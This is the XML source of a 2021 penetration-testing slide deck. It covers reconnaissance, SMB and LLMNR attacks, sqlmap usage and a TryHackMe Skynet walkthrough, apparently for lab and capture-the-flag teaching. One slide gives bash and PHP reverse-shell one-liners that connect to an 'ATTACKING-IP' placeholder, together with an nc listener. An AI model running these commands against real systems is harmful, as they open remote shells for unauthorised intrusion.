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4217A-2851-4929-846B-E7FEEB413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91607-916F-4F29-86F8-43B5C2F31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582F9-7E1D-473A-A527-725AF10F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CC84-29BE-4695-B63A-5E3C5EDF0F11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266B9-CC15-4E93-ADF4-207044E6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28BAC-BF79-4924-BE9E-F1A7ACEE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708C-28EE-4BB8-91F8-DA43E1620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75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999DC-8D8B-4759-84D7-6DC9E89A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B49A0F-39C7-43D5-8A04-F1B4F9CA3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8BD89-4773-429A-939B-743C03D5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CC84-29BE-4695-B63A-5E3C5EDF0F11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F3DCA-5068-447B-9EA4-425006CC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F8225-B209-4685-8F08-C01C7850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708C-28EE-4BB8-91F8-DA43E1620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4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149447-5CE5-4D55-AFB9-BA88BF538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21373C-ACDD-4680-8E94-33C205766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F2A91-A4C7-467E-A11E-10FDF8AF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CC84-29BE-4695-B63A-5E3C5EDF0F11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29C24-F6DD-42A3-AC9D-D676486B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A391B-6792-4CED-BF14-3C6EBC81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708C-28EE-4BB8-91F8-DA43E1620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64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A3DD3-CB03-468C-B115-58743533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F93FF-76A2-473A-99B6-80ACF877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5AA4A-290F-4FB9-B96A-EC733DF3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CC84-29BE-4695-B63A-5E3C5EDF0F11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C896F-3A27-4CB2-8A9E-A7FE0AB8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8ED0A-8472-4F19-A73D-00F33521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708C-28EE-4BB8-91F8-DA43E1620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04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CB4F1-9C95-40E2-BD9F-E9F44B78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E990FE-54B7-425F-950A-0078B8A88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AA93-B0E7-4F43-8564-854B0324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CC84-29BE-4695-B63A-5E3C5EDF0F11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1C769-0C61-42DC-8CE8-B2B4DA4E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DF31C-3346-4990-8609-E3C03ADC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708C-28EE-4BB8-91F8-DA43E1620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86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3C5A1-3F73-43D6-9768-4E91EEE2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1CACE-226D-401D-9519-79D275895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47EB2-94F0-4059-A01A-BF82BD09E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0F5595-112D-4C5B-B210-AB465679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CC84-29BE-4695-B63A-5E3C5EDF0F11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E91D0D-9FB5-4314-813C-F66E2196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EB31D6-D836-4D7A-8B74-2F808AEB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708C-28EE-4BB8-91F8-DA43E1620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48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B3B2C-DAE3-4EB9-8D64-F21D4710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97C46-2C28-4718-B430-68989CFE8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64BC62-7530-43AC-B947-10183D9B5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0F8D84-CF72-4336-8DC5-BDAD71991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A11971-8350-42F2-BBF6-36DF0C1BE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85742D-F7E8-487F-B990-17A97BEB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CC84-29BE-4695-B63A-5E3C5EDF0F11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7613E0-3522-4211-962C-BDF4BDD8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52C32C-6E69-4041-96F9-24D6D528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708C-28EE-4BB8-91F8-DA43E1620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1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BFDE6-39DC-4DF0-9E75-FDB65B13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AA8010-AA30-4463-8347-E7DF1BD6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CC84-29BE-4695-B63A-5E3C5EDF0F11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A2B067-D45B-467D-BE8C-F12ACE59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62551B-5C3F-496B-8E64-6CFE75B2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708C-28EE-4BB8-91F8-DA43E1620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17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893DC4-DC3F-4D06-8A37-6107ECB7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CC84-29BE-4695-B63A-5E3C5EDF0F11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CE3201-0CA0-41D8-B7D1-8499BA47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679471-561E-4F14-B622-A207F4B1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708C-28EE-4BB8-91F8-DA43E1620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6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1450B-C30C-4121-8020-7D4D6A86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58FAB-10A1-4FF2-B889-FFF838C02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DCAFB1-D534-4E92-A751-24F2BC712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237867-39C4-436E-8C3B-103856B8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CC84-29BE-4695-B63A-5E3C5EDF0F11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D24A93-8E74-40FE-8684-6590A9B6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B71A86-CC71-413B-AF65-475965B6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708C-28EE-4BB8-91F8-DA43E1620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2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A7535-067A-478B-89DE-2992D526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D72875-4784-4BB8-95C4-CE38757E7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59BC1F-8D57-428A-97F7-AB693D4EE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3E3502-E2F7-4F33-927A-F3368210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CC84-29BE-4695-B63A-5E3C5EDF0F11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C157D-6FE5-478E-ADDA-9938A393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A9BF29-AF24-450F-BDBE-2F679276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2708C-28EE-4BB8-91F8-DA43E1620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3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848D1A-5EF5-4A57-ABF1-AA2E9C6E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C8446-9752-4009-8C38-DBC4E9D7D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FEFD7-EFE6-4EAF-965E-4F4CCC7E4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8CC84-29BE-4695-B63A-5E3C5EDF0F11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85D4F-FBA7-4493-BD31-2EBBFBF97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74943-BB83-49ED-AFA2-70C058ABB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2708C-28EE-4BB8-91F8-DA43E1620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52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rtcullislabs/udp-proto-scanner.git" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/killswitch-GUI/SimplyEmail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iderLabs/Responder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ccgroup/shock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22BE8-7672-4101-984C-C94F95A86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渗透测试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4BC15F-BA50-40B5-BE4C-20C50FD05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June. 19</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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8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54EB3-868E-4062-AEBD-F2BAE0FA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Reverse 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A67B4-6D35-4FFF-8FE3-AF83B281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exec /bin/bash 0&amp;0 2&gt;&amp;0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0&lt;&amp;196;exec 196&lt;&gt;/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/ATTACKING-IP/80; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php -r '$sock=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fsockopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>("ATTACKING-IP",80);exec("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lnvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393675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30E0F-2FD4-4E2E-A7F7-30C74877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TryHackMe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SkyNet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A310AB-1B73-4908-BF0F-E58579408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https://tryhackme.com/room/skynet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16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2B053-6D89-45C8-A5A7-347F3977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A29EA-C2BC-4D64-87F1-1741B9FFE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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> –v –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>oN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/initial &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip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Ports: 445, 139, 110, 80, 143, 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> –h http://&lt;ip&gt;:80/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> –u http://&lt;ip&gt;/ -w &lt;wordlist&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>squirrelmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/opt/enum4linux.pl –a &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip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Sharename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>milesdyson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, anonymous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637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D333A-50E6-44FD-8875-56562240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F2683-B1D7-4B82-A2BD-4C94B7AB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searchexploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>squirrelmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>smbclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ‘\\&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;\anonymous’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>get log1.txt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B9630F-8409-4E21-AA33-65F51AC6A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0446"/>
            <a:ext cx="7810959" cy="334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2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EB95E-8720-43D4-8FBE-1A48E6C1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6A5EB-6038-49BA-8BD6-B2623A82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/administrator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Cuppa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7689F1-43EE-405A-9EBF-AEF2600A7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4"/>
            <a:ext cx="6647619" cy="1666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15099D-68E3-490C-BB6F-C8847452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124" y="1825624"/>
            <a:ext cx="5539876" cy="373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2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E7D29-691E-4748-9293-17C04F44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35D0A-1D5E-471F-A476-1C0CE4B5B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8CC7EB-BB9E-461D-8314-922C40C8C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8371428" cy="22190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BEB0D7-9FF8-4CA5-9067-AACBA461B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424" y="3528414"/>
            <a:ext cx="5383576" cy="33432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AC2926C-2CFB-479A-A52A-05D1611E3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057166"/>
            <a:ext cx="6345716" cy="27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04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02201-FF60-4328-8014-7A85FB91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Post-Penetration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5A4F667-5663-4917-B8B7-4B017DE39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694" y="1825625"/>
            <a:ext cx="6704612" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258407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FB874-0968-4CA4-9757-B4FFCE29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Post-Penetration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D30925-BE9C-4543-AEC5-384F00875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809" y="3377484"/>
            <a:ext cx="7952381" cy="1247619"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172138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E0A02-F2F0-49BB-B85C-B490B32B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Post-Penetration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612586E-81C3-4F89-A7AC-76C05695B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190" y="3215579"/>
            <a:ext cx="8247619" cy="1571429"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2427126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89AB0-E72E-42B2-AA62-4B3F7BBF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Wildcard Vulnerability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DD28B2B-4939-4AA5-BCB6-D1960A51C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428" y="2972722"/>
            <a:ext cx="9657143" cy="2057143"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121068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C32A8-B1DB-4D20-92A2-18324658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Penetration Steps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11DEE-E007-4EF2-8BD5-FD0AF4DE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Pre-engagement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OSINT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Attacking Network Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Database Penetration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TTY Shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Post-Penetration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202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FDB2F-D2B0-4A2F-98F8-5CB75CC6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Wildcard Vulnerability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95F1B80-74CC-4A89-9C02-3BF083A9C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15439"/>
            <a:ext cx="10515600" cy="771709"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379290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4F82A-8D84-4133-ABE5-3BDBC178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Wildcard Vulnerability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877667C-111F-4330-8987-E95F921AF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905" y="3191770"/>
            <a:ext cx="7876190" cy="1619048"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3146867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4DC97-01C7-4900-A604-57691DCD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flag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7E112F-B103-445C-B3ED-EBDD72E11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034" y="1825625"/>
            <a:ext cx="7773931" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="435557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E41B2-6A93-4179-9D80-9531868E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DawgCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 2021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8CBF5-8047-4FBC-803F-7DA60D1FE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https://umbccd.io/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43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73207-3838-4B76-BE88-D2B17EEE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Pre-engagement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ADDD6-E5A3-4159-871E-B83BBD49E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 up virtual machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Set up server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Use VPN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24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B6308-4F49-44B6-B795-84575588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4015A-1ADF-4AC3-BF47-A749D1C4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whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, dig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nslookup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https://github.com/killswitch-GUI/SimplyEmail.git</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dnsrecon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> –v –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sV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https://github.com/portcullislabs/udp-proto-scanner.git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923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0B67E-C206-46C0-BE8C-2F4B9DFC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Attacking Network Services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9669B-160A-49E1-8032-9106BC513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SMB attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>smbclient</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LLMNR / NBT-NS Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/SpiderLabs/Responder.git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902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EFF62-D08E-4081-9AD4-46D9C700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436CE-F28A-42F0-BE12-BE1573D2E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Class A IP Address Range 0.0.0.0 - 127.255.255.255</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Class B IP Address Range 128.0.0.0 - 191.255.255.255</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Class C IP Address Range 192.0.0.0 - 223.255.255.255</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Class D IP Address Range 224.0.0.0 - 239.255.255.255</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Class E IP Address Range 240.0.0.0 - 255.255.255.255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42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A643D-1E1C-4C76-8ABB-F7A23BCA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5C9A2-B8B0-426C-9CA7-40A749653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searchsploit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https://github.com/nccgroup/shocker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hydra,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>John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Ripper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195984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DB1E5-17D6-474E-904D-EF9A72AD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TTY Shells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D4262-FFBF-46F4-B9D6-537C93D0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-c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pty;pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>("/bin/bash")’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> –i</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>:!bash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84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9A5E5-BC11-4504-9069-C5C83B0D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SQLMap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43BE6-F8A2-48D5-A243-12FA98470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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -u http://meh.com --forms --batch --crawl=10 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> --cookie=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jsessionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=54321 --level=5 --risk=3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" dirty="0"/>
              <a:t>sqlmap -o -u "http://meh.com/form/" --forms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4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403</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>81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渗透测试</vt:lpstr>
      <vt:lpstr>Penetration Steps</vt:lpstr>
      <vt:lpstr>Pre-engagement</vt:lpstr>
      <vt:lpstr>OSINT</vt:lpstr>
      <vt:lpstr>Attacking Network Services</vt:lpstr>
      <vt:lpstr>IPv4</vt:lpstr>
      <vt:lpstr>Exploit</vt:lpstr>
      <vt:lpstr>TTY Shells</vt:lpstr>
      <vt:lpstr>SQLMap</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>TryHackMe SkyNet</vt:lpstr>
      <vt:lpstr>OSINT</vt:lpstr>
      <vt:lpstr>Exploit</vt:lpstr>
      <vt:lpstr>Exploit</vt:lpstr>
      <vt:lpstr>Exploit</vt:lpstr>
      <vt:lpstr>Post-Penetration</vt:lpstr>
      <vt:lpstr>Post-Penetration</vt:lpstr>
      <vt:lpstr>Post-Penetration</vt:lpstr>
      <vt:lpstr>Wildcard Vulnerability</vt:lpstr>
      <vt:lpstr>Wildcard Vulnerability</vt:lpstr>
      <vt:lpstr>Wildcard Vulnerability</vt:lpstr>
      <vt:lpstr>Get flag</vt:lpstr>
      <vt:lpstr>DawgCTF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渗透测试</dc:title>
  <dc:creator>绕鹅 安德</dc:creator>
  <cp:lastModifiedBy>绕鹅 安德</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-19T03:00:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-19T03:43:28Z</dcterms:modified>
</cp:coreProperties>
</file>